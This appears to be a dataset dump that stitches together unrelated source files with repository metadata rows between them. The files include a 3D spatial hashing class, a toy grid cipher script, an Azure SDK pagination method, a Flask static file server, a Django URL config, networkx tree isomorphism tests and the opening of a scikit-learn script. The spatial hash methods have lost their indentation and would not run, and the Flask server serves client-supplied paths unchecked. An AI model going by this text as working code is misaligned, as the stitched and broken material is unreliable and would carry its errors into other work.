        self.n_dims = dims.shape[0]
        # Number of buckets along each axis; partial buckets round up.
        self.buckets_per_dim = np.ceil(dims / bucket_size).astype(np.int32)
        self.bucket_size = bucket_size  # Assuming buckets have equally sized sides
        self.n_buckets = int(np.prod(self.buckets_per_dim))
        self.buckets = {}  # bucket ID -> set of stored objects
        self.clear_buckets()
def get_nearby_objects(self, pos, radius):
"""
Given a position and radius, retrieve all objects in the overlapping buckets.
:param pos: Center of search volume.
:param radius: Radius of search volume.
:return: Objects in buckets overlapping with given volume.
"""
cell_ids = self.get_ids_for_volume(pos, radius)
return self.get_objects_from_buckets(cell_ids)
def get_ids_for_volume(self, pos, radius):
"""
Retrieve the IDs of all buckets overlapping with the volume with the given center position
and given radius.
:param pos: Center of search volume.
:param radius: Radius of search volume.
:return: IDs of buckets overlapping volume.
"""
ids = set()
lowest_pos = np.max((pos - radius, np.zeros((self.n_dims,))), axis=0)
lowest_bucket_lower_bound = (lowest_pos - lowest_pos % self.bucket_size).astype(np.int32)
highest_bucket_upper_bound = (np.min((self.dims, pos + radius + 1.0), axis=0)).astype(np.int32)
for x in range(lowest_bucket_lower_bound[0], highest_bucket_upper_bound[0], self.bucket_size):
for y in range(lowest_bucket_lower_bound[1], highest_bucket_upper_bound[1], self.bucket_size):
for z in range(lowest_bucket_lower_bound[2], highest_bucket_upper_bound[2], self.bucket_size):
ids.add(self.get_id(x, y, z))
return ids
def get_id(self, x, y, z):
"""
Get bucket ID containing the given Cartesian coordinate.
:param x:
:param y:
:param z:
:return:
"""
return x // self.bucket_size + y // self.bucket_size * self.buckets_per_dim[0] + \
z // self.bucket_size * self.buckets_per_dim[0] * self.buckets_per_dim[1]
def get_objects_from_buckets(self, ids):
"""
Given the IDs of buckets, return the union of every set obtained from each individual bucket.
:param ids: Indices of buckets.
:return: Union of objects found in those buckets.
"""
objects = set()
for i in ids:
objects = objects.union(self.buckets[i])
return objects
def clear_buckets(self):
"""
Remove all objects from all buckets in the hash table.
:return:
"""
for idx in range(self.n_buckets):
self.buckets[idx] = set()
def insert_object(self, obj, pos, radius):
"""
Insert an object into all buckets that overlap with the volume with center 'pos' and
radius 'radius'
:param obj: Object to be inserted into buckets
:param pos: Center of search volume.
:param radius: Radius of search volume.
:return:
"""
idxs = self.get_ids_for_volume(pos, radius)
for idx in idxs:
self.buckets[idx].add(obj)
def insert_objects(self, object_structure):
"""
Insert a structure of objects into hash table.
:param object_structure: Data structure where each row is of form (object, position, radius)
:return:
"""
for (obj, pos, radius) in object_structure:
self.insert_object(obj, pos, radius)
    def get_dims(self):
        """Return the coordinate-space extent along each dimension.

        :return: The ``dims`` array passed at construction.
        """
        return self.dims
    def get_buckets_per_dim(self):
        """Return how many buckets lie along each dimension.

        :return: Integer array of bucket counts per dimension.
        """
        return self.buckets_per_dim
    def get_buckets(self):
        """Return the full bucket mapping (bucket ID -> set of objects).

        :return: The internal buckets dict (not a copy).
        """
        return self.buckets
    def get_bucket_content(self, i):
        """Return all objects stored in the bucket with the given ID.

        :param i: ID of the bucket.
        :return: Set of objects in that bucket (not a copy).
        """
        return self.buckets[i]
def get_bucket_center(self, i):
"""
Get the center coordinate (in terms of coordinate system) of bucket with given ID.
:param i: Index of bucket.
:return: Center coordinate of bucket.
"""
center = np.empty((self.n_dims,))
center[0] = i % self.dims[0] * self.bucket_size + self.bucket_size / 2
for d in range(1, self.n_dims):
center[d] = i // np.prod(self.dims[:d]) * self.bucket_size + self.bucket_size / 2
return center
def remove_object(self, obj, pos, radius):
"""
Remove object from all buckets overlapping with volume with center 'pos' and
radius 'radius'.
:param obj: Object to be inserted into buckets
:param pos: Center of search volume.
:param radius: Radius of search volume.
:return:
"""
idxs = self.get_ids_for_volume(pos, radius)
for idx in idxs:
self.buckets[idx].remove(obj)
|
[
"noreply@github.com"
] |
NILOIDE.noreply@github.com
|
9d7a71d485c1957b6370b2641222562691b42037
|
3f40cd227393a1e9c1e76d7da3c9aaefe0581279
|
/venv/main.py
|
35680094676b7cbe1011d7743b8c5b27172918f8
|
[] |
no_license
|
ponikka/Cardano
|
5df4075a98abc1f3360bc9ce2b06b3f072b41f74
|
01c0c47d99a4649f2ab23321f8be78e0f16b900f
|
refs/heads/master
| 2021-02-09T11:47:36.879496
| 2020-03-02T08:16:12
| 2020-03-02T08:16:12
| 244,184,774
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,273
|
py
|
from tabulate import tabulate
from random import choice
from string import ascii_uppercase
from math import sqrt, ceil

# Cardan-grille-style cipher: the phrase is written into a square grid through
# a mask (cells marked 1), and leftover cells are padded with random letters.
alphabet = list(ascii_uppercase)
word = input('Enter the phrase\n').upper()
# Grid side: smallest even integer whose square can hold the phrase.
side = ceil(sqrt(len(word)))
if side % 2 != 0:
    side = side + 1
square = []
square = [[0] * side for i in range(side)]
# Mark the left half of every row as mask holes (the cipher key).
for i in range(side): # create the cipher key
    for j in range(side // 2):
        square[i][j] = 1
print('The KEY:')
print(tabulate(square, tablefmt='grid'))
count = 0
# Top half: write letters into the mask holes and mirror a letter offset by
# (side/2)^2 into the horizontally mirrored cell.
for i in range(side // 2):
    for j in range(side):
        if square[i][j] == 1 and len(word) > count:
            square[i][j] = word[count]
            square[i][side - j - 1] = word[count + (side//2)*(side//2)]
            count = count + 1
# NOTE(review): doubling `count` looks suspicious — presumably it should skip
# past the mirrored block written above; confirm against the intended cipher.
count = count + count
# Bottom half: same scheme, but only mirror while enough letters remain.
for i in range(side // 2, side):
    for j in range(side):
        if square[i][j] == 1 and len(word) > count:
            square[i][j] = word[count]
            if len(word) > count + side:
                square[i][side - j - 1] = word[count + (side//2)*(side//2)]
            count = count + 1
print("Final table:")
# Replace any cell still holding a 0/1 mask marker with a random pad letter.
for i in range(side):
    for j in range(side):
        if square[i][j] == 1 or square[i][j] == 0:
            square[i][j] = choice(alphabet)
print(tabulate(square, tablefmt='grid'))
|
[
"andreev_9000@mail.ru"
] |
andreev_9000@mail.ru
|
1b5849466318aa075976375e01fa22fddd690edc
|
531c47c15b97cbcb263ec86821d7f258c81c0aaf
|
/sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_08_01/operations/_network_interface_load_balancers_operations.py
|
e42bd6eccf89e6b11dbf117b8ae8f3bcc1bcf2ca
|
[
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later",
"MIT"
] |
permissive
|
YijunXieMS/azure-sdk-for-python
|
be364d3b88204fd3c7d223df23756386ff7a3361
|
f779de8e53dbec033f98f976284e6d9491fd60b3
|
refs/heads/master
| 2021-07-15T18:06:28.748507
| 2020-09-04T15:48:52
| 2020-09-04T15:48:52
| 205,457,088
| 1
| 2
|
MIT
| 2020-06-16T16:38:15
| 2019-08-30T21:08:55
|
Python
|
UTF-8
|
Python
| false
| false
| 5,600
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class NetworkInterfaceLoadBalancersOperations(object):
    """NetworkInterfaceLoadBalancersOperations operations.

    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.

    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.network.v2019_08_01.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """

    models = models

    def __init__(self, client, config, serializer, deserializer):
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config

    def list(
        self,
        resource_group_name, # type: str
        network_interface_name, # type: str
        **kwargs # type: Any
    ):
        # type: (...) -> Iterable["models.NetworkInterfaceLoadBalancerListResult"]
        """List all load balancers in a network interface.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param network_interface_name: The name of the network interface.
        :type network_interface_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either NetworkInterfaceLoadBalancerListResult or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_08_01.models.NetworkInterfaceLoadBalancerListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["models.NetworkInterfaceLoadBalancerListResult"]
        error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2019-08-01"

        # Builds the GET request: full templated URL for the first page,
        # the service-provided next_link verbatim for subsequent pages.
        def prepare_request(next_link=None):
            if not next_link:
                # Construct URL
                url = self.list.metadata['url']  # type: ignore
                path_format_arguments = {
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                    'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}  # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
            else:
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Accept'] = 'application/json'
            # Construct and send request
            request = self._client.get(url, query_parameters, header_parameters)
            return request

        # Deserializes one page; returns (next_link or None, iterator of items).
        def extract_data(pipeline_response):
            deserialized = self._deserialize('NetworkInterfaceLoadBalancerListResult', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)

        # Runs one page request and maps error status codes to typed exceptions.
        def get_next(next_link=None):
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)
            return pipeline_response

        return ItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/loadBalancers'}  # type: ignore
|
[
"noreply@github.com"
] |
YijunXieMS.noreply@github.com
|
d4ed49c5ad66c87e5989c74f78149de700205878
|
d104df89c9eeb210a10d45fb11b80bad6e53b30a
|
/150520/new_uri.py
|
39306da7bacddbbb8aacf3c6b09387a758ca5892
|
[] |
no_license
|
tbc31cc/Python-scripts
|
119c54014c1379627237463a65c2b55bf7b5d4ca
|
1e38fe3359401b5a150eed191bbcf39dbafc3e1f
|
refs/heads/master
| 2021-01-10T21:55:25.479996
| 2015-05-20T21:48:47
| 2015-05-20T21:48:47
| 35,639,821
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,617
|
py
|
# Sometimes Spotify stores multiple entries for an album or track, or you may accidentally add an album/track that isn't available in your country
# If you choose a bad URI with the original search, use this to load a new entry that hopefully works
# Now filters out results that are not available in specified country (US) (new method)
# Program now asks user to re-enter searchtype in the case of an invalid entry
# User can choose to open entire list of results as a text file
# Use with command line ""C:\Python27\Lib\new_uri.py" "$ascii(%artist%)" "$ascii(%album%)" "$ascii(%title%)""
import sys
import spotipy #third-party module
import pyperclip #third-party module
import string
# Spotify Web API client (spotipy). NOTE: this file is Python 2
# (raw_input / print statements below).
spotify = spotipy.Spotify()
display = "URI(s) copied to clipboard. Press enter to exit"
# Specified country: results not available in this market are filtered out.
country = u'US'
# args = [path, artist, album, track], taken from command line
if len(sys.argv) > 1:
    artist_name = sys.argv[1]
else:
    artist_name = str(raw_input('Enter artist name: '))
# Choose advanced search type (track or album)
valid_types = ['track','album']
def get_valid_type():
    """Prompt once for a search type; return it if it is in valid_types, else None."""
    answer = str(raw_input("Please type track or album: "))
    return answer if answer in valid_types else None
# Keep prompting until the user enters a valid search type.
while True:
    searchtype = get_valid_type()
    if searchtype:
        break
# Album/track title: taken from argv when supplied, otherwise prompted for.
if searchtype == 'album':
    if len(sys.argv) > 2:
        item = sys.argv[2]
    else:
        item = str(raw_input('Enter album title: '))
elif searchtype == 'track':
    if len(sys.argv) > 3:
        item = sys.argv[3]
    else:
        item = str(raw_input('Enter track title: '))
print 'Finding URI for ' + searchtype +': ' + '"'+item+'"' + ' by ' + artist_name
# Generate search results (up to 20) via the Spotify advanced-search syntax.
results = spotify.search(q="artist:"+artist_name+' '+searchtype+':'+item, type = searchtype, limit = 20)
items = results[searchtype+'s']['items']
# Filter out results not available in specified country: blank them to []
# first, then strip all [] entries so indices stay valid during the scan.
for i, t in enumerate(items):
    if country not in items[i]['available_markets']:
        items[i] = []
while [] in items:
    items.remove([])
# Shorten long strings
def shorten(string):
    """Clip a string to 80 characters, marking the cut with '...'.

    NOTE(review): the parameter shadows the stdlib ``string`` module imported
    at the top of this file; harmless inside this function, but worth renaming.
    """
    return string[0:80] + '...' if len(string) > 80 else string
# Function for generating list of results
def print_info(i,t):
    """Format one search result (index, name, artist, URI) for display.

    Reads the module globals ``searchtype``, ``items`` and ``spotify``.
    Non-printable characters are stripped (Python 2 ``filter`` on a str
    returns a str).
    """
    name = filter(lambda x: x in string.printable, t['name'])
    album_type = ''
    artist = ''
    album = ''
    release_date = ''
    if searchtype == 'album':
        # Albums need an extra lookup for artist name and release year.
        get_artist = spotify.album(t['id'])
        artist_name = get_artist['artists'][0]['name']
        release_date = ' ('+get_artist['release_date'][0:4]+') '
        artist = filter(lambda x: x in string.printable, ' '+artist_name)
        if items[i]['album_type'] != 'album':
            album_type = ' - '+t['album_type']
        line1 = ' '+str(i)+' '+name+album_type+release_date
    elif searchtype == 'track':
        artist = filter(lambda x: x in string.printable, ' '+t['artists'][0]['name']+'\n')
        album = filter(lambda x: x in string.printable, ' from '+'"'+t['album']['name'])
        line1 = shorten(' '+str(i)+' '+name+album)+'"'
    else:
        line1 = ' '+str(i)+' '+name
    line2 = '\n'+artist
    line3 = '\n '+t['uri']+'\n'
    return line1+line2+line3
# If there are multiple results, let user choose which URI to copy to clipboard.
# Searches with one result automatically copies URI.
print '\nResults:\n'
if len(items) > 0:
    for i, t in enumerate(items):
        print print_info(i,t)
    if len(items) == 1:
        n = 0
    else:
        # NOTE(review): Python 2 input() evaluates the typed expression;
        # raw_input + int() would be safer against arbitrary input.
        n = int(input("Choose from provided list. Enter -1 to choose all items "))
    # Copy final result to clipboard/Open full list as text file
    if n == -1:
        text = ''
        for i, t in enumerate(items):
            text = text + '\n' + print_info(i,t)
        import subprocess as sp
        programName = 'notepad.exe'
        with open('output.txt', 'w') as text_file:
            text_file.write(text)
        sp.Popen([programName,'output.txt'])
    else:
        text = items[n]['uri']
    pyperclip.copy(text)
else:
    print 'No results found\n'
    text = 'No results found'
    display = 'Press enter to exit'
raw_input(display)
|
[
"tbc31cc@gmail.com"
] |
tbc31cc@gmail.com
|
60ce8d44e75ecb0dd3ee8a66f4522c00b97994c7
|
e7613f9e21d558cdb304f7268fdec433bbbbf08f
|
/Ohloh.py
|
d91bcdbab7382ccb1b354e773d337075b4dad563
|
[] |
no_license
|
mdavid/web
|
0ea1b67ce2c6006d10c79638f345b344b1aeb129
|
53fd4ca7e2c0053f27bca9384f6b3cc142a17122
|
refs/heads/master
| 2020-12-25T16:35:34.746167
| 2011-11-21T23:08:02
| 2011-11-21T23:08:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,746
|
py
|
# -*- Mode: python; coding: utf-8 -*-
#
# Cherokee Web Site
#
# Authors:
# Alvaro Lopez Ortega <alvaro@alobbs.com>
#
# Copyright (C) 2001-2011 Alvaro Lopez Ortega
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public
# License as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
import CTK
# Ohloh widget embed snippets for project #3906 (loaded client-side).
LANGUAGES_HTML = '<script type="text/javascript" src="http://www.ohloh.net/p/3906/widgets/project_languages.js"></script>'
COCOMO_HTML = '<script type="text/javascript" src="http://www.ohloh.net/p/3906/widgets/project_cocomo.js"></script>'
# Client-side patch: bumps the COCOMO widget's default salary field from
# 55000 to 90000 and triggers its change handler to recompute the estimate.
COCOMO_FIX_JS = """
/* Come on! $55k? Seriously? It must be a typo.. */
$('.ohloh-cocomo-box input:text').filter(function() { return $(this).val() == "55000"; }).each(function() {
     $(this).val (90000);
     $(this).trigger ('change');
});
"""
class Languages (CTK.Box):
    # CTK box embedding the Ohloh languages widget (plus the salary fix JS).
    def __init__ (self):
        CTK.Box.__init__ (self, {'class': 'ohloh-languages-box'})
        self += CTK.RawHTML (LANGUAGES_HTML)
        self += CTK.RawHTML (js = COCOMO_FIX_JS)
class Cocomo (CTK.Box):
    # CTK box embedding the Ohloh COCOMO cost-estimate widget.
    def __init__ (self):
        CTK.Box.__init__ (self, {'class': 'ohloh-cocomo-box'})
        self += CTK.RawHTML (COCOMO_HTML)
        self += CTK.RawHTML (js = COCOMO_FIX_JS)
|
[
"alvaro@alobbs.com"
] |
alvaro@alobbs.com
|
9070f9ba6596fb792ae2d17601a5a9c0581820c3
|
fd8405ac0a5d062907c153f2f2e3569571366539
|
/irbisbooks/core/urls.py
|
17e44ae4a60722f69bb0d5da5d79b7b2b8dec070
|
[] |
no_license
|
ri-gilfanov/irbis-books
|
aab471833035ae51088bccfb0806b863aaba3468
|
0b2a32013ab7f0c0d167e0864a7cb858e8e75add
|
refs/heads/master
| 2021-01-25T13:19:07.818513
| 2018-03-02T09:47:06
| 2018-03-02T09:47:06
| 121,642,933
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 191
|
py
|
from django.urls import path
from . import views
# URL routes for this app: search form at the root, download endpoint below it.
urlpatterns = [
    path('', views.book_search, name='book_search'),
    path('book_download/', views.book_download, name='book_download'),
]
|
[
"ri.gilfanov@yandex.ru"
] |
ri.gilfanov@yandex.ru
|
950b22a78a928e4427896cec1ba0d7c4cac4e011
|
6a4bfff7fcd78a0057401652c7f80d9a95a67267
|
/painless_redirects/tests/test_models.py
|
2f5b98013047caa595a23ef12657abfbbafe3877
|
[
"MIT"
] |
permissive
|
benzkji/django-painless-redirects
|
25987ff984830be7e45b4d0af9a9cd0046beabe7
|
153721486b214ddd5365b6ac5769129562254dd5
|
refs/heads/master
| 2023-05-24T14:23:53.783400
| 2020-06-22T10:35:29
| 2020-06-22T10:35:29
| 22,944,463
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 558
|
py
|
"""Tests for the models of the painless_redirects app."""
from django.test import TestCase
from . import factories
class RedirectModelTestCase(TestCase):
    """Tests for the Redirect model."""
    def test_model(self):
        # A factory-built instance should be persisted (primary key assigned).
        obj = factories.RedirectFactory()
        self.assertTrue(obj.pk)
    def test_redirect_value(self):
        # Without a target site the redirect is a bare path; with new_site set
        # it becomes an absolute URL using the requested scheme.
        obj = factories.RedirectFactory()
        self.assertEqual(obj.redirect_value('http'), "/the-new-path/")
        obj.new_site = factories.SiteFactory()
        self.assertEqual(obj.redirect_value('https'), "https://%s/the-new-path/" % obj.new_site.domain)
|
[
"bnzk@bnzk.ch"
] |
bnzk@bnzk.ch
|
05b6c7a41ca37a887e8c167923f6e78cb61e66c6
|
0f9772eef40e6a995514438020bfe245b0634d23
|
/UnicornsApp/app.py
|
f55610ece2f5f38113de2cbbcf76253188d21c2f
|
[] |
no_license
|
koalaboy808/Crunchbase_InfoViz
|
4edeedd1236fcd0c0e6558cceb5d4dda75ef7c1d
|
d184190a45dfeff2c92223549e0d74fb076eef19
|
refs/heads/master
| 2021-01-01T05:02:11.590233
| 2016-05-06T12:29:58
| 2016-05-06T12:29:58
| 56,036,487
| 3
| 0
| null | 2016-04-22T22:33:15
| 2016-04-12T06:17:33
|
HTML
|
UTF-8
|
Python
| false
| false
| 398
|
py
|
from flask import Flask
# Serve files under public_html/static at the default /static URL prefix.
app = Flask(__name__, static_folder="public_html/static")
@app.route('/')
def load_root():
    """Serve the site index page (public_html/index.html).

    Fix: the original opened the file without ever closing it, leaking a
    file handle per request; a ``with`` block guarantees release.
    """
    with open('public_html/index.html', 'r') as f:
        return f.read()
@app.route('/<path:name>')
def load_file(name=None):
    """Serve an arbitrary file from public_html/ by relative path.

    Fix: close the file handle via a context manager (the original leaked
    one per request).
    NOTE(review): joining a client-supplied path under public_html/ permits
    path traversal (e.g. ``../``) — consider flask's send_from_directory.
    """
    with open('public_html/' + name, 'r') as f:
        return f.read()
# Start the development server only when run directly, not when imported.
if __name__ == "__main__":
    app.run()
|
[
"gracenbrilmyer@ischool.berkeley.edu"
] |
gracenbrilmyer@ischool.berkeley.edu
|
677993bbfd1033c8a7be8606b387754616bdceda
|
853d4cec42071b76a80be38c58ffe0fbf9b9dc34
|
/venv/Lib/site-packages/networkx/algorithms/isomorphism/tests/test_tree_isomorphism.py
|
3082365a4bb61f2d8c99fcddb56c72e2af1d0aeb
|
[] |
no_license
|
msainTesting/TwitterAnalysis
|
5e1646dbf40badf887a86e125ef30a9edaa622a4
|
b1204346508ba3e3922a52380ead5a8f7079726b
|
refs/heads/main
| 2023-08-28T08:29:28.924620
| 2021-11-04T12:36:30
| 2021-11-04T12:36:30
| 424,242,582
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,443
|
py
|
import networkx as nx
import random
import time
from networkx.classes.function import is_directed
from networkx.algorithms.isomorphism.tree_isomorphism import (
rooted_tree_isomorphism,
tree_isomorphism,
)
# have this work for graph
# given two trees (either the directed or undirected)
# transform t2 according to the isomorphism
# and confirm it is identical to t1
# randomize the order of the edges when constructing
def check_isomorphism(t1, t2, isomorphism):
    """Verify that relabeling t2 through `isomorphism` yields exactly t1's edges.

    `isomorphism` is a list of (t1_node, t2_node) pairs. Both graphs must
    agree on directedness (asserted). For undirected graphs each edge is put
    into a canonical (smaller, larger) orientation before comparison.
    """
    # get the name of t1, given the name in t2
    mapping = {v2: v1 for (v1, v2) in isomorphism}
    directed = is_directed(t1)
    assert directed == is_directed(t2)

    def canonical(u, v):
        # directed edges keep their orientation; undirected ones are sorted
        if directed or u < v:
            return (u, v)
        return (v, u)

    edges_1 = [canonical(u, v) for (u, v) in t1.edges()]
    edges_2 = [canonical(mapping[u], mapping[v]) for (u, v) in t2.edges()]
    return sorted(edges_1) == sorted(edges_2)
def test_hardcoded():
    """Check rooted_tree_isomorphism on a fixed 13-node pair, both as
    undirected Graph and as DiGraph; either of the two valid answers passes."""
    print("hardcoded test")
    # define a test problem
    edges_1 = [
        ("a", "b"),
        ("a", "c"),
        ("a", "d"),
        ("b", "e"),
        ("b", "f"),
        ("e", "j"),
        ("e", "k"),
        ("c", "g"),
        ("c", "h"),
        ("g", "m"),
        ("d", "i"),
        ("f", "l"),
    ]
    edges_2 = [
        ("v", "y"),
        ("v", "z"),
        ("u", "x"),
        ("q", "u"),
        ("q", "v"),
        ("p", "t"),
        ("n", "p"),
        ("n", "q"),
        ("n", "o"),
        ("o", "r"),
        ("o", "s"),
        ("s", "w"),
    ]
    # there are two possible correct isomorphisms
    # it currently returns isomorphism1
    # but the second is also correct
    isomorphism1 = [
        ("a", "n"),
        ("b", "q"),
        ("c", "o"),
        ("d", "p"),
        ("e", "v"),
        ("f", "u"),
        ("g", "s"),
        ("h", "r"),
        ("i", "t"),
        ("j", "y"),
        ("k", "z"),
        ("l", "x"),
        ("m", "w"),
    ]
    # could swap y and z
    isomorphism2 = [
        ("a", "n"),
        ("b", "q"),
        ("c", "o"),
        ("d", "p"),
        ("e", "v"),
        ("f", "u"),
        ("g", "s"),
        ("h", "r"),
        ("i", "t"),
        ("j", "z"),
        ("k", "y"),
        ("l", "x"),
        ("m", "w"),
    ]
    t1 = nx.Graph()
    t1.add_edges_from(edges_1)
    root1 = "a"
    t2 = nx.Graph()
    t2.add_edges_from(edges_2)
    root2 = "n"
    isomorphism = sorted(rooted_tree_isomorphism(t1, root1, t2, root2))
    # is correct by hand
    assert (isomorphism == isomorphism1) or (isomorphism == isomorphism2)
    # check algorithmically
    assert check_isomorphism(t1, t2, isomorphism)
    # try again as digraph
    t1 = nx.DiGraph()
    t1.add_edges_from(edges_1)
    root1 = "a"
    t2 = nx.DiGraph()
    t2.add_edges_from(edges_2)
    root2 = "n"
    isomorphism = sorted(rooted_tree_isomorphism(t1, root1, t2, root2))
    # is correct by hand
    assert (isomorphism == isomorphism1) or (isomorphism == isomorphism2)
    # check algorithmically
    assert check_isomorphism(t1, t2, isomorphism)
# randomly swap a tuple (a,b)
def random_swap(t):
    """Return the pair `t` in its original or reversed order with equal
    probability (consumes exactly one randint from the global RNG)."""
    a, b = t
    return (a, b) if random.randint(0, 1) == 1 else (b, a)
# given a tree t1, create a new tree t2
# that is isomorphic to t1, with a known isomorphism
# and test that our algorithm found the right one
def positive_single_tree(t1):
    """Given a tree t1, build a randomly relabeled, edge-shuffled copy t2
    and assert that tree_isomorphism finds a valid isomorphism between them."""
    assert nx.is_tree(t1)
    nodes1 = [n for n in t1.nodes()]
    # get a random permutation of this
    nodes2 = nodes1.copy()
    random.shuffle(nodes2)
    # this is one isomorphism, however they may be multiple
    # so we don't necessarily get this one back
    someisomorphism = [(u, v) for (u, v) in zip(nodes1, nodes2)]
    # map from old to new
    map1to2 = {u: v for (u, v) in someisomorphism}
    # get the edges with the transformed names
    edges2 = [random_swap((map1to2[u], map1to2[v])) for (u, v) in t1.edges()]
    # randomly permute, to ensure we're not relying on edge order somehow
    random.shuffle(edges2)
    # so t2 is isomorphic to t1
    t2 = nx.Graph()
    t2.add_edges_from(edges2)
    # lets call our code to see if t1 and t2 are isomorphic
    isomorphism = tree_isomorphism(t1, t2)
    # make sure we got a correct solution
    # although not necessarily someisomorphism
    assert len(isomorphism) > 0
    assert check_isomorphism(t1, t2, isomorphism)
# run positive_single_tree over all the
# non-isomorphic trees for k from 4 to maxk
# k = 4 is the first level that has more than 1 non-isomorphic tree
# k = 13 takes about 2.86 seconds to run on my laptop
# larger values run slow down significantly
# as the number of trees grows rapidly
def test_positive(maxk=14):
    """Run positive_single_tree over every non-isomorphic tree of size
    2..maxk, printing (size, trees tested, elapsed seconds) per level."""
    print("positive test")
    for k in range(2, maxk + 1):
        start_time = time.time()
        trial = 0
        for t in nx.nonisomorphic_trees(k):
            positive_single_tree(t)
            trial += 1
        print(k, trial, time.time() - start_time)
# test the trivial case of a single node in each tree
# note that nonisomorphic_trees doesn't work for k = 1
def test_trivial():
    """Trivial case: two single-node trees are isomorphic via the one pairing."""
    print("trivial test")
    # back to an undirected graph
    t1 = nx.Graph()
    t1.add_node("a")
    root1 = "a"
    t2 = nx.Graph()
    t2.add_node("n")
    root2 = "n"
    isomorphism = rooted_tree_isomorphism(t1, root1, t2, root2)
    assert isomorphism == [("a", "n")]
    assert check_isomorphism(t1, t2, isomorphism)
# test another trivial case where the two graphs have
# different numbers of nodes
def test_trivial_2():
    """Trees with different node counts must yield an empty isomorphism."""
    print("trivial test 2")
    edges_1 = [("a", "b"), ("a", "c")]
    edges_2 = [("v", "y")]
    t1 = nx.Graph()
    t1.add_edges_from(edges_1)
    t2 = nx.Graph()
    t2.add_edges_from(edges_2)
    isomorphism = tree_isomorphism(t1, t2)
    # they cannot be isomorphic,
    # since they have different numbers of nodes
    assert isomorphism == []
# the function nonisomorphic_trees generates all the non-isomorphic
# trees of a given size. Take each pair of these and verify that
# they are not isomorphic
# k = 4 is the first level that has more than 1 non-isomorphic tree
# k = 11 takes about 4.76 seconds to run on my laptop
# larger values run slow down significantly
# as the number of trees grows rapidly
def test_negative(maxk=11):
    """Every pair of distinct non-isomorphic trees of size 4..maxk must be
    reported as non-isomorphic (empty result) by tree_isomorphism."""
    print("negative test")
    for k in range(4, maxk + 1):
        test_trees = list(nx.nonisomorphic_trees(k))
        start_time = time.time()
        trial = 0
        for i in range(len(test_trees) - 1):
            for j in range(i + 1, len(test_trees)):
                trial += 1
                assert tree_isomorphism(test_trees[i], test_trees[j]) == []
        print(k, trial, time.time() - start_time)
|
[
"msaineti@icloud.com"
] |
msaineti@icloud.com
|
d9fd3e3f6f7c3d6c386072c39ae5b4202edd2d08
|
2f3c4ea9f0a9ab60a38fa8afc9087b327da643be
|
/Cross-Validation/validacao_cruzada_cross_val_score.py
|
5c5d20ef1eee0fe967bf20593a4b9ef4a4db4711
|
[] |
no_license
|
guilhermelamb/Machine-Learning-Studies
|
e919c74f4b881c049b87b46191e65f3f77235d13
|
1abff5a0a063636468b00c68015f1a8c8b058757
|
refs/heads/main
| 2023-08-19T07:55:01.538452
| 2021-10-12T15:13:05
| 2021-10-12T15:13:05
| 333,989,001
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 787
|
py
|
import pandas as pd
